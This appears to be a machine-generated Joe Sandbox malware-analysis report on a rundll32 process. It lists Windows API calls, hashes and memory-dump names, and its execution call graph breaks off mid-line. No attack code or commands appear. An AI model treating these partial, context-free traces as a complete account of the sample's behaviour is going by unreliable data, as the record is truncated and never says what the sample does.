                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharHeapMultiWide$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1432973188-0
                                                                      • Opcode ID: e9916163320ce0a6d1d65ab1cf8f3e792232ff0f1f0028fee70975c1427f4fc5
                                                                      • Instruction ID: 19129e8ce5b59b3fba6961b0ebe157e547c30e371ce5a5e6add60342a8bdb28c
                                                                      • Opcode Fuzzy Hash: e9916163320ce0a6d1d65ab1cf8f3e792232ff0f1f0028fee70975c1427f4fc5
                                                                      • Instruction Fuzzy Hash: 71F096B6A04119BFEB006FE49CC4C7F7ABCDB452647104A35FD15E2190D1349D0497B0
                                                                      Function 04856CED Relevance: 5.0, APIs: 4, Instructions: 31memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000008,00000000,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000,00000000,00000000), ref: 04856CFC
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000,00000000,00000000,00000024,04856AA8), ref: 04856CFF
                                                                        • Part of subcall function 04856D35: EnterCriticalSection.KERNEL32(00000000,74DEF380,?,04856D1C,?,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000), ref: 04856D46
                                                                        • Part of subcall function 04856D35: LeaveCriticalSection.KERNEL32(00000000,?,04856D1C,?,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000,00000000), ref: 04856D7F
                                                                        • Part of subcall function 04856D35: Sleep.KERNEL32(00002710,?,04856D1C,?,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000,00000000), ref: 04856D97
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000,00000000,00000000), ref: 04856D24
                                                                      • HeapFree.KERNEL32(00000000,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000,00000000,00000000,00000024,04856AA8), ref: 04856D27
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CriticalProcessSection$AllocEnterFreeLeaveSleep
                                                                      • String ID:
                                                                      • API String ID: 2739146912-0
                                                                      • Opcode ID: 7d0d2e163c626e6d095bd21e163e3bb06e4aa11d7560ac1bb2214fef272e9981
                                                                      • Instruction ID: 4bcf3a8d7611f5827936bb8cbc81be005768d8276d867b53f887a17f518f8dc9
                                                                      • Opcode Fuzzy Hash: 7d0d2e163c626e6d095bd21e163e3bb06e4aa11d7560ac1bb2214fef272e9981
                                                                      • Instruction Fuzzy Hash: 14E0C972240309ABEB106EE9AC88F17BB9DEB94355F008925FE04DA150DAB9E8048B61
                                                                      Function 0485682F Relevance: 5.0, APIs: 4, Instructions: 31memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000000), ref: 04856851
                                                                      • HeapFree.KERNEL32(00000000), ref: 04856854
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 04856860
                                                                      • HeapFree.KERNEL32(00000000), ref: 04856863
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$FreeProcess
                                                                      • String ID:
                                                                      • API String ID: 3859560861-0
                                                                      • Opcode ID: ab1f79184490effe8152c470365d0a9ebc0b0cbb90d4b9929186183d28544794
                                                                      • Instruction ID: c23fc3ea6f7b6355f7910223d9e09a78c3afedb27e94d427fbb157684f442eb8
                                                                      • Opcode Fuzzy Hash: ab1f79184490effe8152c470365d0a9ebc0b0cbb90d4b9929186183d28544794
                                                                      • Instruction Fuzzy Hash: 12E0127270035867EA109ED6ACC4F17B79CDB94751F444536EF08DB150D564F8049AB1

                                                                      Execution Graph

                                                                      Execution Coverage:16.6%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:2.3%
                                                                      Total number of Nodes:1066
                                                                      Total number of Limit Nodes:33
                                                                      execution_graph 3522 7ff73cfc9223 LeaveCriticalSection 3527 7ff73cfc2820 3528 7ff73cfc2830 LocalFree 3527->3528 3529 7ff73cfc2839 3527->3529 3528->3529 3530 7ff73cfc2845 LocalFree 3529->3530 3531 7ff73cfc284e 3529->3531 3530->3531 3532 7ff73cfc2860 3531->3532 3533 7ff73cfc285a FreeLibrary 3531->3533 3533->3532 3534 7ff73cfc5ea4 3535 7ff73cfc5fcc 3534->3535 3536 7ff73cfc5ee6 _cinit 3534->3536 3536->3535 3537 7ff73cfc5f8a RtlUnwindEx 3536->3537 3537->3536 3538 7ff73cfc2518 3539 7ff73cfc255a 3538->3539 3554 7ff73cfc27d0 3538->3554 3540 7ff73cfc2563 GetModuleHandleW GetProcAddress 3539->3540 3541 7ff73cfc2599 RtlInitUnicodeString 3539->3541 3543 7ff73cfc2589 3540->3543 3542 7ff73cfc196c 38 API calls 3541->3542 3544 7ff73cfc2604 3542->3544 3543->3541 3543->3554 3545 7ff73cfc2632 GetProcAddress 3544->3545 3548 7ff73cfc26aa 3544->3548 3544->3554 3547 7ff73cfc2679 GetProcAddress 3545->3547 3545->3548 3546 7ff73cfc1380 15 API calls 3549 7ff73cfc26ff 3546->3549 3547->3548 3550 7ff73cfc2696 3547->3550 3548->3546 3548->3554 3552 7ff73cfc276f GetModuleHandleW GetProcAddress 3549->3552 3549->3554 3551 7ff73cfc1380 15 API calls 3550->3551 3551->3548 3553 7ff73cfc279f GetModuleHandleW GetProcAddress 3552->3553 3553->3554 3555 7ff73cfc4d70 3556 7ff73cfc4d87 3555->3556 3557 7ff73cfc4d7d 3555->3557 3559 7ff73cfc4b90 3557->3559 3583 7ff73cfc5284 3559->3583 3566 7ff73cfc74a0 __wsetargv 62 API calls 3567 7ff73cfc4be0 __initmbctable 3566->3567 3582 7ff73cfc4d23 3567->3582 3606 7ff73cfc4918 3567->3606 3570 7ff73cfc4d25 3573 7ff73cfc4d3e 3570->3573 3574 7ff73cfc7460 _freefls 62 API calls 3570->3574 3570->3582 3571 7ff73cfc4c1b 3572 7ff73cfc4c3f 3571->3572 3576 7ff73cfc7460 _freefls 62 API calls 3571->3576 3577 7ff73cfc741c _lock 62 API calls 3572->3577 3572->3582 3575 7ff73cfc5798 _errno 62 API calls 3573->3575 3574->3573 3575->3582 3576->3572 3578 7ff73cfc4c6f 3577->3578 3579 7ff73cfc4d12 3578->3579 3581 7ff73cfc7460 _freefls 62 API calls 3578->3581 3616 7ff73cfc731c LeaveCriticalSection 3579->3616 3581->3579 3582->3556 3584 7ff73cfc5200 _getptd 62 API calls 3583->3584 3585 7ff73cfc528f 3584->3585 3586 7ff73cfc4bb4 3585->3586 3587 7ff73cfc5bac _amsg_exit 62 API calls 3585->3587 3588 7ff73cfc47cc 3586->3588 3587->3586 3589 7ff73cfc5284 _getptd 62 API calls 3588->3589 3590 7ff73cfc47db 3589->3590 3591 7ff73cfc47f6 3590->3591 3592 7ff73cfc741c _lock 62 API calls 3590->3592 3593 7ff73cfc4878 3591->3593 3595 7ff73cfc5bac _amsg_exit 62 API calls 3591->3595 3597 7ff73cfc4809 3592->3597 3599 7ff73cfc4888 3593->3599 3595->3593 3596 7ff73cfc483f 3617 7ff73cfc731c LeaveCriticalSection 3596->3617 3597->3596 3598 7ff73cfc7460 _freefls 62 API calls 3597->3598 3598->3596 3618 7ff73cfc4130 3599->3618 3602 7ff73cfc48a8 GetOEMCP 3605 7ff73cfc48b8 3602->3605 3603 7ff73cfc48cd 3604 7ff73cfc48d2 GetACP 3603->3604 3603->3605 3604->3605 3605->3566 3605->3582 3607 7ff73cfc4888 __initmbctable 64 API calls 3606->3607 3608 7ff73cfc493f 3607->3608 3609 7ff73cfc4947 __initmbctable 3608->3609 3610 7ff73cfc4998 IsValidCodePage 3608->3610 3615 7ff73cfc49be __initmbctable 3608->3615 3611 7ff73cfc71f0 _FF_MSGBANNER 8 API calls 3609->3611 3610->3609 3612 7ff73cfc49a9 GetCPInfo 3610->3612 3613 7ff73cfc4b79 3611->3613 3612->3609 3612->3615 3613->3570 3613->3571 3887 7ff73cfc45dc GetCPInfo 3615->3887 3619 7ff73cfc4142 3618->3619 3625 7ff73cfc41a3 3618->3625 3620 7ff73cfc5284 _getptd 62 API calls 3619->3620 3621 7ff73cfc4147 3620->3621 3622 7ff73cfc417c 3621->3622 3626 7ff73cfc509c 3621->3626 3624 7ff73cfc47cc __initmbctable 62 API calls 3622->3624 3622->3625 3624->3625 3625->3602 3625->3603 3627 7ff73cfc5284 _getptd 62 API calls 3626->3627 3628 7ff73cfc50a7 3627->3628 3629 7ff73cfc50d0 3628->3629 3631 7ff73cfc50c2 3628->3631 3630 7ff73cfc741c _lock 62 API calls 3629->3630 3632 7ff73cfc50da 3630->3632 3633 7ff73cfc5284 _getptd 62 API calls 3631->3633 3640 7ff73cfc5044 3632->3640 3634 7ff73cfc50c7 3633->3634 3638 7ff73cfc5108 3634->3638 3639 7ff73cfc5bac _amsg_exit 62 API calls 3634->3639 3638->3622 3639->3638 3641 7ff73cfc508e 3640->3641 3642 7ff73cfc5052 _freefls _getptd 3640->3642 3644 7ff73cfc731c LeaveCriticalSection 3641->3644 3642->3641 3645 7ff73cfc4ec8 3642->3645 3647 7ff73cfc4f5f 3645->3647 3655 7ff73cfc4ee6 3645->3655 3646 7ff73cfc4fb2 3656 7ff73cfc4fdf 3646->3656 3713 7ff73cfc7974 3646->3713 3647->3646 3648 7ff73cfc7460 _freefls 62 API calls 3647->3648 3649 7ff73cfc4f83 3648->3649 3652 7ff73cfc7460 _freefls 62 API calls 3649->3652 3651 7ff73cfc4f25 3653 7ff73cfc4f47 3651->3653 3664 7ff73cfc7460 _freefls 62 API calls 3651->3664 3657 7ff73cfc4f97 3652->3657 3659 7ff73cfc7460 _freefls 62 API calls 3653->3659 3655->3647 3655->3651 3661 7ff73cfc7460 _freefls 62 API calls 3655->3661 3658 7ff73cfc502a 3656->3658 3669 7ff73cfc7460 62 API calls _freefls 3656->3669 3663 7ff73cfc7460 _freefls 62 API calls 3657->3663 3665 7ff73cfc4f53 3659->3665 3660 7ff73cfc7460 _freefls 62 API calls 3660->3656 3662 7ff73cfc4f19 3661->3662 3673 7ff73cfc7dd0 3662->3673 3667 7ff73cfc4fa6 3663->3667 3668 7ff73cfc4f3b 3664->3668 3670 7ff73cfc7460 _freefls 62 API calls 3665->3670 3671 7ff73cfc7460 _freefls 62 API calls 3667->3671 3701 7ff73cfc7d64 3668->3701 3669->3656 3670->3647 3671->3646 3674 7ff73cfc7dd9 3673->3674 3699 7ff73cfc7ed4 3673->3699 3675 7ff73cfc7df3 3674->3675 3676 7ff73cfc7460 _freefls 62 API calls 3674->3676 3677 7ff73cfc7e05 3675->3677 3679 7ff73cfc7460 _freefls 62 API calls 3675->3679 3676->3675 3678 7ff73cfc7e17 3677->3678 3680 7ff73cfc7460 _freefls 62 API calls 3677->3680 3681 7ff73cfc7e29 3678->3681 3682 7ff73cfc7460 _freefls 62 API calls 3678->3682 3679->3677 3680->3678 3683 7ff73cfc7e3b 3681->3683 3684 7ff73cfc7460 _freefls 62 API calls 3681->3684 3682->3681 3685 7ff73cfc7e4d 3683->3685 3686 7ff73cfc7460 _freefls 62 API calls 3683->3686 3684->3683 3687 7ff73cfc7e5f 3685->3687 3688 7ff73cfc7460 _freefls 62 API calls 3685->3688 3686->3685 3689 7ff73cfc7e71 3687->3689 3690 7ff73cfc7460 _freefls 62 API calls 3687->3690 3688->3687 3691 7ff73cfc7e83 3689->3691 3692 7ff73cfc7460 _freefls 62 API calls 3689->3692 3690->3689 3693 7ff73cfc7e95 3691->3693 3694 7ff73cfc7460 _freefls 62 API calls 3691->3694 3692->3691 3695 7ff73cfc7eaa 3693->3695 3696 7ff73cfc7460 _freefls 62 API calls 3693->3696 3694->3693 3697 7ff73cfc7460 _freefls 62 API calls 3695->3697 3698 7ff73cfc7ebf 3695->3698 3696->3695 3697->3698 3698->3699 3700 7ff73cfc7460 _freefls 62 API calls 3698->3700 3699->3651 3700->3699 3702 7ff73cfc7d69 3701->3702 3711 7ff73cfc7dca 3701->3711 3703 7ff73cfc7d82 3702->3703 3705 7ff73cfc7460 _freefls 62 API calls 3702->3705 3704 7ff73cfc7d94 3703->3704 3706 7ff73cfc7460 _freefls 62 API calls 3703->3706 3707 7ff73cfc7da6 3704->3707 3708 7ff73cfc7460 _freefls 62 API calls 3704->3708 3705->3703 3706->3704 3709 7ff73cfc7db8 3707->3709 3710 7ff73cfc7460 _freefls 62 API calls 3707->3710 3708->3707 3709->3711 3712 7ff73cfc7460 _freefls 62 API calls 3709->3712 3710->3709 3711->3653 3712->3711 3714 7ff73cfc797d 3713->3714 3886 7ff73cfc4fd3 3713->3886 3715 7ff73cfc7460 _freefls 62 API calls 3714->3715 3716 7ff73cfc798e 3715->3716 3717 7ff73cfc7460 _freefls 62 API calls 3716->3717 3718 7ff73cfc7997 3717->3718 3719 7ff73cfc7460 _freefls 62 API calls 3718->3719 3720 7ff73cfc79a0 3719->3720 3721 7ff73cfc7460 _freefls 62 API calls 3720->3721 3722 7ff73cfc79a9 3721->3722 3723 7ff73cfc7460 _freefls 62 API calls 3722->3723 3724 7ff73cfc79b2 3723->3724 3725 7ff73cfc7460 _freefls 62 API calls 3724->3725 3726 7ff73cfc79bb 3725->3726 3727 7ff73cfc7460 _freefls 62 API calls 3726->3727 3728 7ff73cfc79c3 3727->3728 3729 7ff73cfc7460 _freefls 62 API calls 3728->3729 3730 7ff73cfc79cc 3729->3730 3731 7ff73cfc7460 _freefls 62 API calls 3730->3731 3732 7ff73cfc79d5 3731->3732 3733 7ff73cfc7460 _freefls 62 API calls 3732->3733 3734 7ff73cfc79de 3733->3734 3735 7ff73cfc7460 _freefls 62 API calls 3734->3735 3736 7ff73cfc79e7 3735->3736 3737 7ff73cfc7460 _freefls 62 API calls 3736->3737 3738 7ff73cfc79f0 3737->3738 3739 7ff73cfc7460 _freefls 62 API calls 3738->3739 3740 7ff73cfc79f9 3739->3740 3741 7ff73cfc7460 _freefls 62 API calls 3740->3741 3742 7ff73cfc7a02 3741->3742 3743 7ff73cfc7460 _freefls 62 API calls 3742->3743 3744 7ff73cfc7a0b 3743->3744 3745 7ff73cfc7460 _freefls 62 API calls 3744->3745 3746 7ff73cfc7a14 3745->3746 3747 7ff73cfc7460 _freefls 62 API calls 3746->3747 3748 7ff73cfc7a20 3747->3748 3749 7ff73cfc7460 _freefls 62 API calls 3748->3749 3750 7ff73cfc7a2c 3749->3750 3751 7ff73cfc7460 _freefls 62 API calls 3750->3751 3752 7ff73cfc7a38 3751->3752 3753 7ff73cfc7460 _freefls 62 API calls 3752->3753 3754 7ff73cfc7a44 3753->3754 3755 7ff73cfc7460 _freefls 62 API calls 3754->3755 3756 7ff73cfc7a50 3755->3756 3757 7ff73cfc7460 _freefls 62 API calls 3756->3757 3758 7ff73cfc7a5c 3757->3758 3759 7ff73cfc7460 _freefls 62 API calls 3758->3759 3760 7ff73cfc7a68 3759->3760 3761 7ff73cfc7460 _freefls 62 API calls 3760->3761 3762 7ff73cfc7a74 3761->3762 3763 7ff73cfc7460 _freefls 62 API calls 3762->3763 3764 7ff73cfc7a80 3763->3764 3765 7ff73cfc7460 _freefls 62 API calls 3764->3765 3766 7ff73cfc7a8c 3765->3766 3767 7ff73cfc7460 _freefls 62 API calls 3766->3767 3768 7ff73cfc7a98 3767->3768 3769 7ff73cfc7460 _freefls 62 API calls 3768->3769 3770 7ff73cfc7aa4 3769->3770 3771 7ff73cfc7460 _freefls 62 API calls 3770->3771 3772 7ff73cfc7ab0 3771->3772 3773 7ff73cfc7460 _freefls 62 API calls 3772->3773 3774 7ff73cfc7abc 3773->3774 3775 7ff73cfc7460 _freefls 62 API calls 3774->3775 3776 7ff73cfc7ac8 3775->3776 3777 7ff73cfc7460 _freefls 62 API calls 3776->3777 3778 7ff73cfc7ad4 3777->3778 3779 7ff73cfc7460 _freefls 62 API calls 3778->3779 3780 7ff73cfc7ae0 3779->3780 3781 7ff73cfc7460 _freefls 62 API calls 3780->3781 3782 7ff73cfc7aec 3781->3782 3783 7ff73cfc7460 _freefls 62 API calls 3782->3783 3784 7ff73cfc7af8 3783->3784 3785 7ff73cfc7460 _freefls 62 API calls 3784->3785 3786 7ff73cfc7b04 3785->3786 3787 7ff73cfc7460 _freefls 62 API calls 3786->3787 3788 7ff73cfc7b10 3787->3788 3789 7ff73cfc7460 _freefls 62 API calls 3788->3789 3790 7ff73cfc7b1c 3789->3790 3791 7ff73cfc7460 _freefls 62 API calls 3790->3791 3792 7ff73cfc7b28 3791->3792 3793 7ff73cfc7460 _freefls 62 API calls 3792->3793 3794 7ff73cfc7b34 3793->3794 3795 7ff73cfc7460 _freefls 62 API calls 3794->3795 3796 7ff73cfc7b40 3795->3796 3797 7ff73cfc7460 _freefls 62 API calls 3796->3797 3798 7ff73cfc7b4c 3797->3798 3799 7ff73cfc7460 _freefls 62 API calls 3798->3799 3800 7ff73cfc7b58 3799->3800 3801 7ff73cfc7460 _freefls 62 API calls 3800->3801 3802 7ff73cfc7b64 3801->3802 3803 7ff73cfc7460 _freefls 62 API calls 3802->3803 3804 7ff73cfc7b70 3803->3804 3805 7ff73cfc7460 _freefls 62 API calls 3804->3805 3806 7ff73cfc7b7c 3805->3806 3807 7ff73cfc7460 _freefls 62 API calls 3806->3807 3808 7ff73cfc7b88 3807->3808 3809 7ff73cfc7460 _freefls 62 API calls 3808->3809 3810 7ff73cfc7b94 3809->3810 3811 7ff73cfc7460 _freefls 62 API calls 3810->3811 3812 7ff73cfc7ba0 3811->3812 3813 7ff73cfc7460 _freefls 62 API calls 3812->3813 3814 7ff73cfc7bac 3813->3814 3815 7ff73cfc7460 _freefls 62 API calls 3814->3815 3816 7ff73cfc7bb8 3815->3816 3817 7ff73cfc7460 _freefls 62 API calls 3816->3817 3818 7ff73cfc7bc4 3817->3818 3819 7ff73cfc7460 _freefls 62 API calls 3818->3819 3820 7ff73cfc7bd0 3819->3820 3821 7ff73cfc7460 _freefls 62 API calls 3820->3821 3822 7ff73cfc7bdc 3821->3822 3823 7ff73cfc7460 _freefls 62 API calls 3822->3823 3824 7ff73cfc7be8 3823->3824 3825 7ff73cfc7460 _freefls 62 API calls 3824->3825 3826 7ff73cfc7bf4 3825->3826 3827 7ff73cfc7460 _freefls 62 API calls 3826->3827 3828 7ff73cfc7c00 3827->3828 3829 7ff73cfc7460 _freefls 62 API calls 3828->3829 3830 7ff73cfc7c0c 3829->3830 3831 7ff73cfc7460 _freefls 62 API calls 3830->3831 3832 7ff73cfc7c18 3831->3832 3833 7ff73cfc7460 _freefls 62 API calls 3832->3833 3834 7ff73cfc7c24 3833->3834 3835 7ff73cfc7460 _freefls 62 API calls 3834->3835 3836 7ff73cfc7c30 3835->3836 3837 7ff73cfc7460 _freefls 62 API calls 3836->3837 3838 7ff73cfc7c3c 3837->3838 3839 7ff73cfc7460 _freefls 62 API calls 3838->3839 3840 7ff73cfc7c48 3839->3840 3841 7ff73cfc7460 _freefls 62 API calls 3840->3841 3842 7ff73cfc7c54 3841->3842 3843 7ff73cfc7460 _freefls 62 API calls 3842->3843 3844 7ff73cfc7c60 3843->3844 3845 7ff73cfc7460 _freefls 62 API calls 3844->3845 3846 7ff73cfc7c6c 3845->3846 3847 7ff73cfc7460 _freefls 62 API calls 3846->3847 3848 7ff73cfc7c78 3847->3848 3849 7ff73cfc7460 _freefls 62 API calls 3848->3849 3850 7ff73cfc7c84 3849->3850 3851 7ff73cfc7460 _freefls 62 API calls 3850->3851 3852 7ff73cfc7c90 3851->3852 3853 7ff73cfc7460 _freefls 62 API calls 3852->3853 3854 7ff73cfc7c9c 3853->3854 3855 7ff73cfc7460 _freefls 62 API calls 3854->3855 3856 7ff73cfc7ca8 3855->3856 3857 7ff73cfc7460 _freefls 62 API calls 3856->3857 3858 7ff73cfc7cb4 3857->3858 3859 7ff73cfc7460 _freefls 62 API calls 3858->3859 3860 7ff73cfc7cc0 3859->3860 3861 7ff73cfc7460 _freefls 62 API calls 3860->3861 3862 7ff73cfc7ccc 3861->3862 3863 7ff73cfc7460 _freefls 62 API calls 3862->3863 3864 7ff73cfc7cd8 3863->3864 3865 7ff73cfc7460 _freefls 62 API calls 3864->3865 3866 7ff73cfc7ce4 3865->3866 3867 7ff73cfc7460 _freefls 62 API calls 3866->3867 3868 7ff73cfc7cf0 3867->3868 3869 7ff73cfc7460 _freefls 62 API calls 3868->3869 3870 7ff73cfc7cfc 3869->3870 3871 7ff73cfc7460 _freefls 62 API calls 3870->3871 3872 7ff73cfc7d08 3871->3872 3873 7ff73cfc7460 _freefls 62 API calls 3872->3873 3874 7ff73cfc7d14 3873->3874 3875 7ff73cfc7460 _freefls 62 API calls 3874->3875 3876 7ff73cfc7d20 3875->3876 3877 7ff73cfc7460 _freefls 62 API calls 3876->3877 3878 7ff73cfc7d2c 3877->3878 3879 7ff73cfc7460 _freefls 62 API calls 3878->3879 3880 7ff73cfc7d38 3879->3880 3881 7ff73cfc7460 _freefls 62 API calls 3880->3881 3882 7ff73cfc7d44 3881->3882 3883 7ff73cfc7460 _freefls 62 API calls 3882->3883 3884 7ff73cfc7d50 3883->3884 3885 7ff73cfc7460 _freefls 62 API calls 3884->3885 3885->3886 3886->3660 3888 7ff73cfc4629 __initmbctable 3887->3888 3896 7ff73cfc470f 3887->3896 3897 7ff73cfc7154 3888->3897 3891 7ff73cfc71f0 _FF_MSGBANNER 8 API calls 3893 7ff73cfc47b3 3891->3893 3893->3609 3895 7ff73cfc6f5c __initmbctable 68 API calls 3895->3896 3896->3891 3898 7ff73cfc4130 __initmbctable 62 API calls 3897->3898 3899 7ff73cfc7178 3898->3899 3907 7ff73cfc6ff4 3899->3907 3902 7ff73cfc6f5c 3903 7ff73cfc4130 __initmbctable 62 API calls 3902->3903 3904 7ff73cfc6f80 3903->3904 3920 7ff73cfc6c90 3904->3920 3908 7ff73cfc7033 3907->3908 3909 7ff73cfc7039 MultiByteToWideChar 3907->3909 3908->3909 3910 7ff73cfc7062 3909->3910 3918 7ff73cfc705b 3909->3918 3912 7ff73cfc7081 __initmbctable 3910->3912 3914 7ff73cfc8cd4 malloc 62 API calls 3910->3914 3911 7ff73cfc71f0 _FF_MSGBANNER 8 API calls 3913 7ff73cfc46ab 3911->3913 3915 7ff73cfc70e3 MultiByteToWideChar 3912->3915 3912->3918 3913->3902 3914->3912 3916 7ff73cfc7104 GetStringTypeW 3915->3916 3917 7ff73cfc7119 3915->3917 3916->3917 3917->3918 3919 7ff73cfc7460 _freefls 62 API calls 3917->3919 3918->3911 3919->3918 3921 7ff73cfc6ccf MultiByteToWideChar 3920->3921 3923 7ff73cfc6d37 3921->3923 3929 7ff73cfc6d3e 3921->3929 3925 7ff73cfc71f0 _FF_MSGBANNER 8 API calls 3923->3925 3924 7ff73cfc6daf MultiByteToWideChar 3926 7ff73cfc6f21 3924->3926 3927 7ff73cfc6dd5 LCMapStringW 3924->3927 3928 7ff73cfc46da 3925->3928 3926->3923 3933 7ff73cfc7460 _freefls 62 API calls 3926->3933 3927->3926 3931 7ff73cfc6dff 3927->3931 3928->3895 3930 7ff73cfc8cd4 malloc 62 API calls 3929->3930 3932 7ff73cfc6d69 __initmbctable 3929->3932 3930->3932 3934 7ff73cfc6e0a 3931->3934 3936 7ff73cfc6e41 3931->3936 3932->3923 3932->3924 3933->3923 3934->3926 3935 7ff73cfc6e1d LCMapStringW 3934->3935 3935->3926 3938 7ff73cfc6e5e __initmbctable 3936->3938 3939 7ff73cfc8cd4 malloc 62 API calls 3936->3939 3937 7ff73cfc6eb3 LCMapStringW 3940 7ff73cfc6f10 3937->3940 3941 7ff73cfc6ed4 WideCharToMultiByte 3937->3941 3938->3926 3938->3937 3939->3938 3940->3926 3942 7ff73cfc7460 _freefls 62 API calls 3940->3942 3941->3940 3942->3926 3944 7ff73cfc20f0 RtlEqualUnicodeString 3945 7ff73cfc2123 __initmbctable 3944->3945 3946 7ff73cfc9170 3949 7ff73cfc60a4 3946->3949 3950 7ff73cfc5200 _getptd 62 API calls 3949->3950 3951 7ff73cfc60c2 3950->3951 3952 7ff73cfc2868 3953 7ff73cfc1380 15 API calls 3952->3953 3954 7ff73cfc28cb 3953->3954 3955 7ff73cfc1170 11 API calls 3954->3955 3962 7ff73cfc297f 3954->3962 3956 7ff73cfc28f8 3955->3956 3957 7ff73cfc1170 11 API calls 3956->3957 3956->3962 3958 7ff73cfc292d 3957->3958 3958->3962 3963 7ff73cfc2998 3958->3963 3961 7ff73cfc2998 11 API calls 3961->3962 3964 7ff73cfc1170 11 API calls 3963->3964 3965 7ff73cfc29da 3964->3965 3966 7ff73cfc1170 11 API calls 3965->3966 3969 7ff73cfc2956 3965->3969 3967 7ff73cfc2a00 3966->3967 3968 7ff73cfc1170 11 API calls 3967->3968 3967->3969 3968->3969 3969->3961 3969->3962 3970 7ff73cfc52a8 3971 7ff73cfc52b1 3970->3971 3972 7ff73cfc53d0 3970->3972 3973 7ff73cfc52cc 3971->3973 3974 7ff73cfc7460 _freefls 62 API calls 3971->3974 3975 7ff73cfc52da 3973->3975 3977 7ff73cfc7460 _freefls 62 API calls 3973->3977 3974->3973 3976 7ff73cfc52e8 3975->3976 3978 7ff73cfc7460 _freefls 62 API calls 3975->3978 3979 7ff73cfc52f6 3976->3979 3980 7ff73cfc7460 _freefls 62 API calls 3976->3980 3977->3975 3978->3976 3981 7ff73cfc5304 3979->3981 3982 7ff73cfc7460 _freefls 62 API calls 3979->3982 3980->3979 3983 7ff73cfc5312 3981->3983 3984 7ff73cfc7460 _freefls 62 API calls 3981->3984 3982->3981 3985 7ff73cfc5323 3983->3985 3986 7ff73cfc7460 _freefls 62 API calls 3983->3986 3984->3983 3987 7ff73cfc533b 3985->3987 3988 7ff73cfc7460 _freefls 62 API calls 3985->3988 3986->3985 3989 7ff73cfc741c _lock 62 API calls 3987->3989 3988->3987 3992 7ff73cfc5347 3989->3992 3990 7ff73cfc5374 4002 7ff73cfc731c LeaveCriticalSection 3990->4002 3992->3990 3994 7ff73cfc7460 _freefls 62 API calls 3992->3994 3994->3990 4003 7ff73cfc3fee 4004 7ff73cfc4062 4003->4004 4005 7ff73cfc402e 4003->4005 4009 7ff73cfc40f4 4004->4009 4016 7ff73cfc3ef8 GetModuleHandleW GetProcAddress 4004->4016 4006 7ff73cfc3da8 15 API calls 4005->4006 4006->4004 4010 7ff73cfc4092 GetModuleHandleW GetProcAddress 4011 7ff73cfc40ba 4010->4011 4011->4009 4012 7ff73cfc1170 11 API calls 4011->4012 4013 7ff73cfc40d4 4012->4013 4014 7ff73cfc40ea LocalFree 4013->4014 4024 7ff73cfc3b74 4013->4024 4014->4009 4017 7ff73cfc3f57 4016->4017 4018 7ff73cfc3fd1 4017->4018 4019 7ff73cfc1170 11 API calls 4017->4019 4018->4009 4018->4010 4023 7ff73cfc3f70 4019->4023 4020 7ff73cfc3fc1 4021 7ff73cfc3fcb LocalFree 4020->4021 4021->4018 4022 7ff73cfc1170 11 API calls 4022->4023 4023->4020 4023->4021 4023->4022 4025 7ff73cfc3bac 4024->4025 4027 7ff73cfc3d86 4025->4027 4060 7ff73cfc224c 4025->4060 4027->4014 4029 7ff73cfc3bd4 4031 7ff73cfc224c 13 API calls 4029->4031 4032 7ff73cfc3bed 4031->4032 4033 7ff73cfc3bf9 4032->4033 4034 7ff73cfc22f0 2 API calls 4032->4034 4035 7ff73cfc224c 13 API calls 4033->4035 4034->4033 4036 7ff73cfc3c12 4035->4036 4037 7ff73cfc3d59 4036->4037 4043 7ff73cfc22f0 2 API calls 4036->4043 4038 7ff73cfc3d68 4037->4038 4039 7ff73cfc3d5e LocalFree 4037->4039 4040 7ff73cfc3d77 4038->4040 4041 7ff73cfc3d6d LocalFree 4038->4041 4039->4038 4040->4027 4042 7ff73cfc3d7c LocalFree 4040->4042 4041->4040 4042->4027 4044 7ff73cfc3c37 4043->4044 4044->4037 4070 7ff73cfc3a80 4044->4070 4046 7ff73cfc3c53 4047 7ff73cfc3a80 2 API calls 4046->4047 4048 7ff73cfc3c5e 4047->4048 4049 